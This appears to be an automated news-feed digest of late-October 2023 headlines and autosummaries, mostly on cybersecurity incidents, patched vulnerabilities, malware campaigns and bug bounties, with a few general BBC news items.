            rusia-ucrania
            2023-11-01 https://www.bleepingcomputer.com/news/legal/fsb-arrests-russian-hackers-working-for-ukrainian-cyber-forces/
            Russia's security agency published a press release on Tuesday saying that its officers detained two hackers who either assisted or joined Ukraine's hackers in cyber operations. [...] "

            Autosummary: "


            Who killed Mozi? Finally putting the IoT zombie botnet in its grave

            industry
            2023-11-01 https://www.welivesecurity.com/en/eset-research/who-killed-mozi-finally-putting-the-iot-zombie-botnet-in-its-grave/
            How ESET Research found a kill switch that had been used to take down one of the most prolific botnets out there "

            Autosummary: The kill switch demonstrated several functionalities, including: killing the parent process, i.e., the original Mozi malware; disabling some system services such as sshd and dropbear; replacing the original Mozi file with itself; executing some router/device configuration commands; disabling access to various ports (iptables -j DROP); and establishing the same foothold as the replaced original Mozi file. We identified two versions of the control payload, with the latest one functioning as an envelope containing the first one with minor modifications, such as adding a function to ping a remote server, probably meant for statistical purposes. "


            Exploit released for critical Cisco IOS XE flaw, many hosts still hacked

            exploits
            2023-10-31 https://www.bleepingcomputer.com/news/security/exploit-released-for-critical-cisco-ios-xe-flaw-many-hosts-still-hacked/
            Public exploit code is now available for the critical Cisco IOS XE vulnerability tracked as CVE-2023-20198 that was leveraged as a zero-day to hack tens of thousands of devices. [...] "

            Autosummary: [Image: Attacker sends commands for reconnaissance purposes (source: LeakIX)] In a PCAP file of the session shared with BleepingComputer, we can see the attackers execute the following commands: "show ip interface brief", "show ip dns view" and "show ip name-servers". These are all commands that serve reconnaissance purposes, to collect information that would lead to the discovery of high-value targets. Cisco patches more IOS XE versions: Cisco has updated its security bulletin for CVE-2023-20198 on October 30, announcing updates for IOS XE that address the vulnerability. "


            Vulnerability management metrics: How to measure success

            exploits industry
            2023-10-31 https://www.helpnetsecurity.com/2023/10/31/vulnerability-management-metrics/

            Without the right metrics, vulnerability management is pretty pointless. If you’re not measuring, how do you know it’s working? So how do you know what to focus on? The list is potentially endless, and it can be hard to know what’s really important. In this article, we’ll help you identify the key metrics that you need to track the state of your vulnerability management program and create audit-ready reports that: Prove your security posture Meet … More

            The post Vulnerability management metrics: How to measure success appeared first on Help Net Security.

            "

            Autosummary: In this article, we’ll help you identify the key metrics that you need to track the state of your vulnerability management program and create audit-ready reports that prove your security posture, meet vulnerability remediation SLAs and benchmarks, help pass audits and compliance, demonstrate ROI on security tools, simplify risk analysis, and prioritize resource allocation. Why vulnerability management needs metrics: Measuring how quickly you find, prioritize and fix flaws allows you to continuously monitor and optimize your security. How long it takes to fix issues is down to you, and this gives you a current snapshot of your ‘cyber hygiene’ – the scan coverage, the time taken to fix issues over a period of six months, and the average time to fix issues overall. Modern scanners like Intruder provide automated, audit-ready reports, but it’s important to know where all your digital assets are to avoid blind spots, unpatched systems and inaccurate reporting – which is why asset discovery is integral to successful vulnerability management. "


            The hidden costs of data breaches for small businesses

            financial
            2023-10-31 https://www.helpnetsecurity.com/2023/10/31/small-business-data-safety/

            Nearly 8 in 10 small business leaders admit they are anxious about the safety of their company’s sensitive data and information, according to Shred-it. According to the Identity Theft Resource Center’s report, the number of data breaches remains in line with the all-time high set in 2021, and consumers are not oblivious to the stark realities of cybercrime. 81% of consumers would stop engaging with a brand online following a data breach, stated a Ping … More

            The post The hidden costs of data breaches for small businesses appeared first on Help Net Security.

            "

            Autosummary: Data breaches affect 1 in 4 small businesses: This year, Shred-it’s report found that 1 in 4 of the small business leaders surveyed reportedly experienced a data breach in the past and, of those, 50% said it was caused by employee error. "


            Canada bans WeChat and Kaspersky apps on government-issued mobile devices

            government
            2023-10-31 https://securityaffairs.com/153274/intelligence/canada-ban-wechat-kaspersky.html

            Canada banned the Chinese messaging app WeChat and Kaspersky antivirus on government mobile devices due to privacy and security risks. The Government of Canada announced a ban on the use of the WeChat and Kaspersky applications on government-issued mobile devices due to privacy and security risks. The ban will be effective starting from October 30, […]

            The post Canada bans WeChat and Kaspersky apps on government-issued mobile devices appeared first on Security Affairs.

            "

            Autosummary: Canada bans WeChat and Kaspersky apps on government-issued mobile devices Pierluigi Paganini October 31, 2023 Canada banned the Chinese messaging app WeChat and Kaspersky antivirus on government mobile devices due to privacy and security risks. "


            What exactly will the UK government's global AI Safety Summit achieve?

            government
            2023-10-31 https://www.computerworld.com/article/3709749/what-exactly-will-the-uk-governments-global-ai-safety-summit-achieve.html#tk.rss_security

            From tomorrow, the UK government is hosting the first global AI Safety Summit, bringing together about 100 people from industry and government to develop a shared understanding of the emerging risks of leading-edge AI while unlocking its benefits. 

            The event will be held at Bletchley Park, a site in Milton Keynes that became the home of code breakers during World War II and saw the development of Colossus, the world’s first programmable digital electronic computer, used to decrypt the Nazi Party’s Enigma code, shortening the war by at least two years.


            "

            Autosummary: “We do need to look at what impact AI is going to have on the current economy and the jobs that we currently do, and hopefully balance that with what opportunities, new industries, and new jobs AI is going to create,” Blows said. Leadership in this space also needs to emerge in the coming months, said the Forum on Information and Democracy's Bak, who added that while he applauded the UK government for trying to grasp this particular nettle, any future policy or regulatory work that takes place to address the impact of these frontier technologies needs to reflect more than just the views of those who can afford a seat at the table, and focus on the power imbalances that exist between civil society and the corporate world. “The UK wants to be seen as an innovation hub and [AI technologies are] clearly going to be a massive area of growth and development, both for the economy and the workforce,” said Philip Blows, CEO of StreaksAI, a UK-based developer of AI technology. "


            Atlassian patches critical Confluence bug, urges for immediate action (CVE-2023-22518)

            exploits
            2023-10-31 https://www.helpnetsecurity.com/2023/10/31/cve-2023-22518/

            Atlassian is urging enterprise administrators to update their on-premises Confluence Data Center and Server installations quickly to plug a critical security vulnerability (CVE-2023-22518) that could lead to “significant data loss if exploited by an unauthenticated attacker.” About CVE-2023-22518: CVE-2023-22518 has been categorized as an improper authorization vulnerability, but no other details have been shared by the Australian software maker. It affects all versions of Confluence Data Center and Server before versions 7.19.16, 8.3.4, 8.4.4, 8.5.3 … More

            The post Atlassian patches critical Confluence bug, urges for immediate action (CVE-2023-22518) appeared first on Help Net Security.

            "

            Autosummary: "


            Canada Bans WeChat and Kaspersky Apps On Government Devices

            government
            2023-10-31 https://thehackernews.com/2023/10/canada-bans-wechat-and-kaspersky-apps.html
            Canada on Monday announced a ban on the use of apps from Tencent and Kaspersky on government mobile devices, citing an "unacceptable level of risk to privacy and security." "The Government of Canada is committed to keeping government information and networks secure," the Canadian government said. "We regularly monitor potential threats and take immediate action to address risks." To that end, "

            Autosummary: "


            Dragos and Rockwell Automation strengthen ICS/OT cybersecurity threat detection for organizations

            industry ciber
            2023-10-31 https://www.helpnetsecurity.com/2023/10/31/dragos-rockwell-automation-partnership/

            Dragos announced the expansion of its combined capabilities in partnership with Rockwell Automation. With this expansion, Rockwell will be making the Dragos Platform available to organizations for enhanced ICS/OT cybersecurity threat detection, providing global deployment services and support capabilities to help customers operationalize their security investment. The threat detection capabilities build on the previous global agreement between Dragos and Rockwell for the OT Incident Response Retainer (IRR) program that helps industrial organizations prepare for, respond … More

            The post Dragos and Rockwell Automation strengthen ICS/OT cybersecurity threat detection for organizations appeared first on Help Net Security.

            "

            Autosummary: "


            BiBi-Linux wiper targets Israeli companies

            Linux
            2023-10-31 https://www.helpnetsecurity.com/2023/10/31/bibi-linux-wiper/

            Attackers have started using new wiper malware called BiBi-Linux to attack Israeli companies and destroy their data. The BiBi-Linux wiper: The Security Joes Incident Response team found the malware during a forensics investigation of a breach within an Israeli company. “This malware is an x64 ELF executable, lacking obfuscation or protective measures. It allows attackers to specify target folders and can potentially destroy an entire operating system if run with root permissions,” Security Joes researchers … More

            The post BiBi-Linux wiper targets Israeli companies appeared first on Help Net Security.

            "

            Autosummary: “During execution, it produces extensive [terminal] output, which can be mitigated using the ‘nohup’ command. "


            Malicious NuGet Packages Caught Distributing SeroXen RAT Malware

            exploits
            2023-10-31 https://thehackernews.com/2023/10/malicious-nuget-packages-caught.html
            Cybersecurity researchers have uncovered a new set of malicious packages published to the NuGet package manager using a lesser-known method for malware deployment. Software supply chain security firm ReversingLabs described the campaign as coordinated and ongoing since August 1, 2023, while linking it to a host of rogue NuGet packages that were observed delivering a remote access trojan called "

            Autosummary: Software supply chain security firm ReversingLabs described the campaign as coordinated and ongoing since August 1, 2023, while linking it to a host of rogue NuGet packages that were observed delivering a remote access trojan called SeroXen RAT. "The threat actors behind it are tenacious in their desire to plant malware into the NuGet repository, and to continuously publish new malicious packages," Karlo Zanki, reverse engineer at ReversingLabs, said in a report shared with The Hacker News. These packages, which span several versions, imitate popular packages and exploit NuGet's MSBuild integrations feature, specifically a feature called inline tasks, to achieve code execution and implant malicious code on their victims. "


            Atlassian Warns of New Critical Confluence Vulnerability Threatening Data Loss

            exploits
            2023-10-31 https://thehackernews.com/2023/10/atlassian-warns-of-new-critical.html
            Atlassian has warned of a critical security flaw in Confluence Data Center and Server that could result in "significant data loss if exploited by an unauthenticated attacker." Tracked as CVE-2023-22518, the vulnerability is rated 9.1 out of a maximum of 10 on the CVSS scoring system. It has been described as an instance of "improper authorization vulnerability." All versions of Confluence Data "

            Autosummary: "


            Trojanized PyCharm Software Version Delivered via Google Search Ads

            exploits
            2023-10-31 https://thehackernews.com/2023/10/trojanized-pycharm-software-version.html
            A new malvertising campaign has been observed capitalizing on a compromised website to promote spurious versions of PyCharm on Google search results by leveraging Dynamic Search Ads. "Unbeknownst to the site owner, one of their ads was automatically created to promote a popular program for Python developers, and visible to people doing a Google search for it," Jérôme Segura, director of threat "

            Autosummary: "


            Experts released PoC exploit code for Cisco IOS XE flaw CVE-2023-20198

            exploits
            2023-10-31 https://securityaffairs.com/153285/hacking/cisco-ios-xe-cve-2023-20198-poc.html

            Researchers publicly released the exploit code for the critical Cisco IOS XE vulnerability tracked as CVE-2023-20198. Researchers at Horizon3.ai publicly released the exploit code for the critical Cisco IOS XE vulnerability tracked as CVE-2023-20198. Cisco recently warned customers of a zero-day vulnerability, tracked as CVE-2023-20198 (CVSS score 10), in its IOS XE Software that is actively exploited […]

            The post Experts released PoC exploit code for Cisco IOS XE flaw CVE-2023-20198 appeared first on Security Affairs.

            "

            Autosummary: Experts released PoC exploit code for Cisco IOS XE flaw CVE-2023-20198 Pierluigi Paganini October 31, 2023 Researchers publicly released the exploit code for the critical Cisco IOS XE vulnerability tracked as CVE-2023-20198. Cisco recently warned customers of a zero-day vulnerability, tracked as CVE-2023-20198 (CVSS score 10), in its IOS XE Software that is actively exploited in attacks. "


            Mexico storm: Dozens still missing after Hurricane Otis hit

            latam
            2023-10-31 https://www.bbc.co.uk/news/world-latin-america-67272805?at_medium=RSS&at_campaign=KARANGA
            Forty-five bodies have been recovered but dozens of people have still not been found. "

            Autosummary: "


            Dozens of countries will pledge to stop paying ransomware gangs

            exploits ransomware
            2023-10-31 https://www.bleepingcomputer.com/news/security/dozens-of-countries-will-pledge-to-stop-paying-ransomware-gangs/
            An alliance of 40 countries will sign a pledge during the third annual International Counter-Ransomware Initiative summit in Washington, D.C., to stop paying ransoms demanded by cybercriminal groups. [...] "

            Autosummary: "


            Samsung Galaxy gets new Auto Blocker anti-malware feature

            exploits
            2023-10-31 https://www.bleepingcomputer.com/news/security/samsung-galaxy-gets-new-auto-blocker-anti-malware-feature/
            Samsung has unveiled a new security feature called "Auto Blocker" as part of the One UI 6 update, offering enhanced malware protection on Galaxy devices. [...] "

            Autosummary: "


            Malicious NuGet packages abuse MSBuild to install malware

            exploits
            2023-10-31 https://www.bleepingcomputer.com/news/security/malicious-nuget-packages-abuse-msbuild-to-install-malware/
            A new NuGet typosquatting campaign pushes malicious packages that abuse Visual Studio's MSBuild integration to execute code and install malware stealthily. [...] "

            Autosummary: The analysts also report observing strong ties to a campaign reported by Phylum at the start of the month, where the attackers used typosquatting to mimic crypto projects and deliver SeroXen RAT. ReversingLabs reports that the threat actors immediately attempted to upload new packages after previous ones were removed, showing intent to continue the campaign. The purpose of the package: "To demonstrate that any NuGet package can run arbitrary code on your machine." However, this is the first documented case of threat actors leveraging this feature in malicious NuGet packages. "


            Avast confirms it tagged Google app as malware on Android phones

            exploits
            2023-10-31 https://www.bleepingcomputer.com/news/security/avast-confirms-it-tagged-google-app-as-malware-on-android-phones/
            Czech cybersecurity company Avast confirmed that its antivirus SDK has been flagging a Google Android app as malware on Huawei, Vivo, and Honor smartphones since Saturday. [...] "

            Autosummary: [Image: Google app mistakenly flagged as malware (BleepingComputer)] Avast antivirus SDK behind false positive: While Google couldn't pinpoint the security service or app that was triggering the false positive, Avast confirmed on Tuesday that its Android antivirus SDK was the one that mistakenly tagged the Google Quick Search Box app launcher as malware. "


            British Library knocked offline by weekend cyberattack

            ciber
            2023-10-31 https://www.bleepingcomputer.com/news/security/british-library-knocked-offline-by-weekend-cyberattack/
            The British Library has been hit by a major IT outage affecting its website and many of its services following a "cyber incident" that impacted its systems on Saturday, October 28. [...] "

            Autosummary: "


            India’s biggest data breach? Hacking gang claims to have stolen 815 million people’s personal information

            financial
            2023-10-31 https://www.bitdefender.com/blog/hotforsecurity/indias-biggest-data-breach-hacking-gang-claims-to-have-stolen-815-million-peoples-personal-information/
            The personal information of more than 815 million people in India has reportedly been leaked online. According to local media reports, hackers have offered for sale the personally identifiable information (PII) - including that found on Aadhaar identity cards - belonging to hundreds of millions of Indian residents. Read more in my article on the Hot for Security blog. "

            Autosummary: A threat actor calling themselves "pwn0001" posted on the Breach Forums black hat hacking site, saying that they had the records of 815 million people available, including Aadhaar and passport information, names, phone numbers, and addresses. "


            Sam Bankman-Fried pressed in court over past comments

            financial
            2023-10-31 https://www.bbc.co.uk/news/world-us-canada-67272395?at_medium=RSS&at_campaign=KARANGA
            As inconsistencies were put to him, the former crypto boss tried to distance himself from some decisions. "

            Autosummary: "


            Closing the gender gap: 7 ways to attract more women into cybersecurity

            ciber
            2023-10-31 https://www.welivesecurity.com/en/we-live-progress/closing-gender-gap-7-ways-attract-more-women-cybersecurity/
            Global Diversity Awareness Month is a timely occasion to reflect on the steps required to remove the obstacles to women's participation in the security industry, as well as to consider the value of inclusion and diversity in the security workforce. "

            Autosummary: Several reasons stand out: security has a reputation of being a male-dominated, jargon-heavy and elitist sector which is hard to break into without the right qualifications; discrimination (30% of female security professionals say they feel discriminated against at work); a perception that jobs don’t offer sufficient flexible working options; employers failing to encourage new mothers back into the workplace; a bias from employers towards screening applicants by qualifications/certifications rather than experience or transferable skills, which may mean that new mothers returning from a break who may be looking for a career change are ruled out; a perception that security is just about technical skills, when there are varied roles that require creativity, flexibility, good communication, problem solving and other skills; relatively low numbers of girls studying STEM subjects at school/university; and a vicious circle in that the security sector lacks female mentors and role models to encourage the next generation into the industry. Are things improving? Women, for example, hold just a quarter of security roles worldwide, as gender diversity in security remains a stubborn challenge and, unsurprisingly, as such mirrors the reality in computer sciences. As we wrap up October, which is also Global Diversity Awareness Month, this is an opportune moment to reflect on the actions needed to break down the biases and barriers that are hindering the participation of women in security, as well as to consider the value of inclusion in the security workforce. It’s probably no surprise then that gender, racial and ethnic diversity also remains lacking, and that’s despite the fact that a diverse and inclusive workforce is known to foster innovation and growth, not to mention its contribution to a more equitable society. "


            Companies scramble to integrate immediate recovery into ransomware plans

            exploits ransomware
            2023-10-30 https://www.helpnetsecurity.com/2023/10/30/holistic-ransomware-strategy/

            More than one-third of companies still do not have a well-rounded, holistic ransomware strategy in place, according to Zerto. Immediate recovery crucial for businesses’ survival: The survey also found that companies are reevaluating their data protection and cyber resilience strategies to align more closely with the threats they are facing. The report shows that 35.4% of companies are not prioritizing recovery. This is concerning as ransomware actors are becoming more capable of impounding data. Businesses … More

            The post Companies scramble to integrate immediate recovery into ransomware plans appeared first on Help Net Security.

            "

            Autosummary: Reevaluating data protection in the face of ransomware: Still, the fact that companies are reevaluating strategies they have in place, especially considering that nearly two thirds (63.1%) of those surveyed have multiple data protection and ransomware detection tools at their disposal, signals that prevention is not enough and that legacy data protection falls short. "


            IoT’s convenience comes with cybersecurity challenges

            industry ciber
            2023-10-30 https://www.helpnetsecurity.com/2023/10/30/iot-cybersecurity-concerns-video/

            The rapid proliferation of Internet of Things (IoT) devices has ushered in a new era of connectivity and convenience, transforming the way we live and work. However, this interconnectivity has also given rise to a host of cybersecurity challenges and vulnerabilities. Protecting the vast and diverse array of IoT devices, from smart home appliances to industrial sensors, has become an imperative in safeguarding data, privacy, and critical infrastructure. In this Help Net Security round-up, we … More

            The post IoT’s convenience comes with cybersecurity challenges appeared first on Help Net Security.

            "

            Autosummary: "


            Google expands bug bounty program to cover AI-related threats

            exploits
            2023-10-30 https://www.helpnetsecurity.com/2023/10/30/google-ai-bug-bounty/

            Google has expanded its bug bounty program, aka Vulnerability Rewards Program (VRP), to cover threats that could arise from Google’s generative AI systems. Google’s AI bug bounty program: Following the voluntary commitment to the Biden-Harris Administration to develop responsible AI and manage its risks, Google has added AI-related risks to its bug bounty program, which gives recognition and compensation to ethical hackers who successfully find and disclose vulnerabilities in Google’s systems. The company identified common … More

            The post Google expands bug bounty program to cover AI-related threats appeared first on Help Net Security.

            "

            Autosummary: "


            The dangers of dual ransomware attacks

            exploits ransomware
            2023-10-30 https://www.helpnetsecurity.com/2023/10/30/dual-ransomware-attacks-dangers/

            At some point in the movie “Groundhog Day,” Phil Connors breaks his bedside radio when he is woken up (yet again) by the song “I Got You Babe”. This déjà vu seems to await companies that fall victim to ransomware and fail to orchestrate the proper response. The FBI has recently warned about dual ransomware attacks, a new trend that involves criminals carrying out two or more attacks in close proximity to each other. The … More

            The post The dangers of dual ransomware attacks appeared first on Help Net Security.

            "

            Autosummary: In a traditional disaster recovery scenario, root causes are known and causes mitigated, but in a cyber-attack scenario, without the proper response actions to investigate and mitigate what you find, systems are restored along with all the malicious accounts, compromised passwords, persistence mechanisms, and other malicious artifacts, while protective controls with missing rules or that were bypassed remain ineffective to stop a recurrence. Preventing a follow-up attack: These response actions push out the achievable recovery time objective, but the vulnerabilities found must be patched, the malicious accounts removed, the protective and detective controls bolstered to prevent or detect a recurrence, and all malicious artifacts must be removed prior to redeployment back into production. "


            Hackers Using MSIX App Packages to Infect Windows PCs with GHOSTPULSE Malware

            exploits
            2023-10-30 https://thehackernews.com/2023/10/hackers-using-msix-app-packages-to.html
            A new cyber attack campaign has been observed using spurious MSIX Windows app package files for popular software such as Google Chrome, Microsoft Edge, Brave, Grammarly, and Cisco Webex to distribute a novel malware loader dubbed GHOSTPULSE. "MSIX is a Windows app package format that developers can leverage to package, distribute, and install their applications to Windows users," Elastic "

            Autosummary: "


            StripedFly, a complex malware that infected one million devices without being noticed

            exploits
            2023-10-30 https://securityaffairs.com/153208/malware/stripedfly-complex-malware.html

            A sophisticated malware tracked as StripedFly remained undetected for five years and infected approximately one million devices. Researchers from Kaspersky discovered a sophisticated malware, dubbed StripedFly, that remained under the radar for five years masquerading as a cryptocurrency miner. In 2022, the researchers detected within the WININIT.EXE process older code that was associated with […]

            The post StripedFly, a complex malware that infected one million devices without being noticed appeared first on Security Affairs.

            "

            Autosummary: The malware uses the modules for storing its configuration, upgrading and uninstalling itself, establishing a reverse proxy, harvesting credentials, performing reconnaissance and files, taking screenshots, executing processes, recording microphone input, and mining for Monero. "


            Citrix Bleed: Mass exploitation in progress (CVE-2023-4966)

            exploits
            2023-10-30 https://www.helpnetsecurity.com/2023/10/30/cve-2023-4966-exploited/

            CVE-2023-4966, aka “Citrix Bleed”, a critical information disclosure vulnerability affecting Citrix NetScaler ADC/Gateway devices, is being massively exploited by threat actors. According to security researcher Kevin Beaumont’s cybersecurity industry sources, one ransomware group has already distributed a Python script to automate the attack chain to their operators, and other groups have started leveraging a working exploit. CVE-2023-4966 exploited: Threat actors have been quick to leverage vulnerabilities in Citrix NetScaler ADC in the past, and this … More

            The post Citrix Bleed: Mass exploitation in progress (CVE-2023-4966) appeared first on Help Net Security.

            "

            Autosummary: A week later, Mandiant researchers revealed that the vulnerability has been exploited as a zero-day by attackers since late August 2023, to attack professional services, technology, and government organizations. "


            EleKtra-Leak Cryptojacking Attacks Exploit AWS IAM Credentials Exposed on GitHub

            exploits
            2023-10-30 https://thehackernews.com/2023/10/elektra-leak-cryptojacking-attacks.html
            A new ongoing campaign dubbed EleKtra-Leak has set its eyes on exposed Amazon Web Service (AWS) identity and access management (IAM) credentials within public GitHub repositories to facilitate cryptojacking activities. "As a result of this, the threat actor associated with the campaign was able to create multiple AWS Elastic Compute (EC2) instances that they used for wide-ranging and "

            Autosummary: "As a result of this, the threat actor associated with the campaign was able to create multiple AWS Elastic Compute (EC2) instances that they used for wide-ranging and long-lasting cryptojacking operations," Palo Alto Networks Unit 42 researchers William Gamazo and Nathaniel Quist said in a technical report shared with The Hacker News. "


            HackerOne awarded over $300 million bug hunters

            exploits
            2023-10-30 https://securityaffairs.com/153221/security/hackerone-bug-bounty-programs.html

            HackerOne announced that it has awarded over $300 million bug hunters as part of its bug bounty programs since the launch of its platform. HackerOne announced that it has surpassed $300 million in total all-time rewards on the HackerOne platform. Thirty white hat hackers have earned more than one million dollars submitting vulnerabilities through the […]

            The post HackerOne awarded over $300 million bug hunters appeared first on Security Affairs.

            "

            Autosummary: HackerOne awarded over $300 million bug hunters Pierluigi Paganini October 30, 2023 October 30, 2023 HackerOne announced that it has awarded over $300 million bug hunters as part of its bug bounty programs since the launch of its platform. "


            Toronto Public Library services down following weekend cyberattack

            ciber
            2023-10-30 https://www.bleepingcomputer.com/news/security/toronto-public-library-services-down-following-weekend-cyberattack/
            The Toronto Public Library (TPL) is warning that many of its online services are offline after suffering a cyberattack over the weekend, on Saturday, October 28. [...] "

            Autosummary: "


            New BiBi-Linux wiper malware targets Israeli orgs in destructive attacks

            exploits Linux
            2023-10-30 https://www.bleepingcomputer.com/news/security/new-bibi-linux-wiper-malware-targets-israeli-orgs-in-destructive-attacks/
            A new malware wiper known as BiBi-Linux is being used to destroy data in attacks targeting Linux systems belonging to Israeli companies. [...] "

            Autosummary: The malware reveals its true nature by not dropping a ransom note or providing victims with a way to reach out to the attackers to negotiate payment for a decryptor, even though it fakes file encryption. "This new threat does not establish communication with remote Command & Control (C2) servers for data exfiltration, employ reversible encryption algorithms, or leave ransom notes as a means to coerce victims into making payments," said Security Joes. "


            Huawei, Vivo phones tag Google app as TrojanSMS-PA malware

            exploits
            2023-10-30 https://www.bleepingcomputer.com/news/security/huawei-vivo-phones-tag-google-app-as-trojansms-pa-malware/
            Huawei, Honor, and Vivo smartphones and tablets are displaying strange "Security threat" alerts urging the deletion of the Google app, warning that it is detected as the "TrojanSMS-PA" malware. [...] "

            Autosummary: "This app was detected sending SMS privately, enticing users to pay with adult content, downloading/installing apps privately, or stealing private information, which may cause property damage and privacy leakage," reads the security alert details. "


            F5 fixes critical BIG-IP vulnerability, PoC is public (CVE-2023-46747)

            exploits
            2023-10-30 https://www.helpnetsecurity.com/2023/10/30/cve-2023-46747/

            F5 Networks has released hotfixes for three vulnerabilities affecting its BIG-IP multi-purpose networking devices/modules, including a critical authentication bypass vulnerability (CVE-2023-46747) that could lead to unauthenticated remote code execution (RCE). About CVE-2023-46747 Discovered and reported by Thomas Hendrickson and Michael Weber of Praetorian Security, CVE-2023-46747 is a request smuggling bug in the Apache JServ Protocol (AJP) used by the vulnerable devices. “This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system … More

            The post F5 fixes critical BIG-IP vulnerability, PoC is public (CVE-2023-46747) appeared first on Help Net Security.

            "

            Autosummary: It affects the following versions of all BIG-IP modules: 17.1.0 16.1.0 – 16.1.4 15.1.0 – 15.1.10 14.1.0 – 14.1.5 13.1.0 – 13.1.5 Fixes and mitigations F5’s BIG-IP devices are used by governments, ISPs, telecoms, cloud service providers and other big enterprises around the world to manage and inspect network and application traffic. "


            Pro-Hamas Hacktivists Targeting Israeli Entities with Wiper Malware

            exploits
            2023-10-30 https://thehackernews.com/2023/10/pro-hamas-hacktivists-targeting-israeli.html
            A pro-Hamas hacktivist group has been observed using a new Linux-based wiper malware dubbed BiBi-Linux Wiper, targeting Israeli entities amidst the ongoing Israeli-Hamas war. "This malware is an x64 ELF executable, lacking obfuscation or protective measures," Security Joes said in a new report published today. "It allows attackers to specify target folders and can potentially destroy an entire "

            Autosummary: "While the string "bibi" (in the filename), may appear random, it holds significant meaning when mixed with topics such as politics in the Middle East, as it is a common nickname used for the Israeli Prime Minister, Benjamin Netanyahu," the cybersecurity company added. "


            RCE exploit for Wyze Cam v3 publicly released, patch now

            exploits
            2023-10-30 https://www.bleepingcomputer.com/news/security/rce-exploit-for-wyze-cam-v3-publicly-released-patch-now/
            A security researcher has published a proof-of-concept (PoC) exploit for Wyze Cam v3 devices that opens a reverse shell and allows the takeover of vulnerable devices. [...] "

            Autosummary: Wyze Cam v3 is a top-selling, inexpensive indoor/outdoor security camera with support for color night vision, SD card storage, cloud connectivity for smartphone control, IP65 weatherproofing, and more. "


            FTC orders non-bank financial firms to report breaches in 30 days

            financial
            2023-10-30 https://www.bleepingcomputer.com/news/security/ftc-orders-non-bank-financial-firms-to-report-breaches-in-30-days/
            The U.S. Federal Trade Commission (FTC) has amended the Safeguards Rules, mandating that all non-banking financial institutions report data breach incidents within 30 days. [...] "

            Autosummary: Such entities include mortgage brokers, motor vehicle dealers, payday lenders, investment firms, insurance companies, peer-to-peer lenders, and asset management firms. "


            Canada bans Chinese app WeChat from government devices

            government
            2023-10-30 https://www.bbc.co.uk/news/technology-67268653?at_medium=RSS&at_campaign=KARANGA
            It's worried about spying with the app, which is like WhatsApp, Facebook, Amazon and Tinder combined "

            Autosummary: "


            20 scary cybersecurity facts and figures for a haunting Halloween

            ciber
            2023-10-30 https://www.welivesecurity.com/en/cybersecurity/20-scary-cybersecurity-facts-figures-haunting-halloween/
            Cybersecurity Awareness Month draws to a close and Halloween is just around the corner, so here is a bunch of spine-tingling figures about some very real tricks and threats lurking online "

            Autosummary: "


            Week in review: VMware patches critical vulnerability, 1Password affected by Okta breach

            exploits
            2023-10-29 https://www.helpnetsecurity.com/2023/10/29/week-in-review-vmware-patches-critical-vulnerability-1password-affected-by-okta-breach/

            Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: GOAD: Vulnerable Active Directory environment for practicing attack techniques Game of Active Directory (GOAD) is a free pentesting lab. It provides a vulnerable Active Directory environment for pen testers to practice common attack methods. “Disappearing” implants, followed by first fixes for exploited Cisco IOS XE zero-day Cisco has released the first fixes for the IOS XE zero-day (CVE-2023-20198) exploited by … More

            The post Week in review: VMware patches critical vulnerability, 1Password affected by Okta breach appeared first on Help Net Security.

            "

            Autosummary: New infosec products of the week: October 27, 2023 Here’s a look at the most interesting products from the past week, featuring releases from Darktrace, Data Theorem, Jumio, Malwarebytes, Progress, and Wazuh. "


            Hurricane Otis: Mexico troops tackle looting in devastated Acapulco

            latam government
            2023-10-29 https://www.bbc.co.uk/news/world-latin-america-67253576?at_medium=RSS&at_campaign=KARANGA
            Thousands of soldiers and police go into the Mexican resort city ravaged by a powerful hurricane. "

            Autosummary: "


            Sale of NHS data up to government, says tech boss

            government
            2023-10-29 https://www.bbc.co.uk/news/technology-67254010?at_medium=RSS&at_campaign=KARANGA
            The head of Palantir, which is in the running for an NHS contract, says it would not have access to data. "

            Autosummary: "


            Major search in Colombia for footballer Diaz's father

            latam
            2023-10-29 https://www.bbc.co.uk/sport/football/67257588?at_medium=RSS&at_campaign=KARANGA
            A major military and police search is under way for the father of Liverpool player Luis Diaz in Colombia, with the country's authorities offering a £40,000 reward for information leading to his rescue. "

            Autosummary: "


            New Hunters International ransomware possible rebrand of Hive

            exploits ransomware
            2023-10-29 https://www.bleepingcomputer.com/news/security/new-hunters-international-ransomware-possible-rebrand-of-hive/
            A new ransomware-as-a-service brand named Hunters International has emerged using code used by the Hive ransomware operation, leading to the valid assumption that the old gang has resumed activity under a different flag. [...] "

            Autosummary: Hunters International ransomware leaks data of one victim source: BleepingComputer As spotted by MalwareHunterTeam, Hunters International's data leak site shows a set of messages, likely in an attempt to share with the world that they mean serious business and "hunting" for victims and extorting them is their main purpose. "


            "Accidental" malvertising via Dynamic Search Ads delivers malware frenzy

            exploits
            2023-10-29 https://www.malwarebytes.com/blog/threat-intelligence/2023/10/malvertising-via-dynamic-search-ads-delivers-malware-bonanza

            Categories: Threat Intelligence

            Tags: malvertising

            Tags: ads

            Tags: google

            Tags: dynamic search ads

            Tags: python

            Tags: pycharm

            Tags: malware

            Dynamically generated ads can be problematic when the content they are created from has been compromised.

            (Read more...)

            The post "Accidental" malvertising via Dynamic Search Ads delivers malware frenzy appeared first on Malwarebytes Labs.

            "

            Autosummary: Malwarebytes already detected all the payloads with its anti-malware and heuristic engines. For example, the screenshot below shows that overlay advertising a license key for Pycharm, a popular program used by software developers: Malvertising via Dynamic Search Ad Dynamic Search Ads (DSA) are a type of Google ads that use the content of a website to automate the creation of ads. "


            Bug hunters earned $1,038,250 for 58 unique 0-days at Pwn2Own Toronto 2023

            exploits
            2023-10-28 https://securityaffairs.com/153169/hacking/pwn2own-toronto-2023-ended.html

            The Pwn2Own Toronto 2023 hacking competition is over; bug hunters earned $1,038,500 for 58 zero-day exploits. The Pwn2Own Toronto 2023 hacking competition is over; the organizers awarded $1,038,250 for 58 unique 0-days. The Team Viettel (@vcslab) won the Master of Pwn with $180K and 30 points. The vulnerabilities exploited by the experts have been disclosed […]

            The post Bug hunters earned $1,038,250 for 58 unique 0-days at Pwn2Own Toronto 2023 appeared first on Security Affairs.

            "

            Autosummary: Bug hunters earned $1,038,250 for 58 unique 0-days at Pwn2Own Toronto 2023 Pierluigi Paganini October 28, 2023 October 28, 2023 The Pwn2Own Toronto 2023 hacking competition is over, bug hunters earned $1,038,500 for 58 zero-day exploits. "


            HackerOne paid ethical hackers over $300 million in bug bounties

            exploits
            2023-10-28 https://www.bleepingcomputer.com/news/security/hackerone-paid-ethical-hackers-over-300-million-in-bug-bounties/
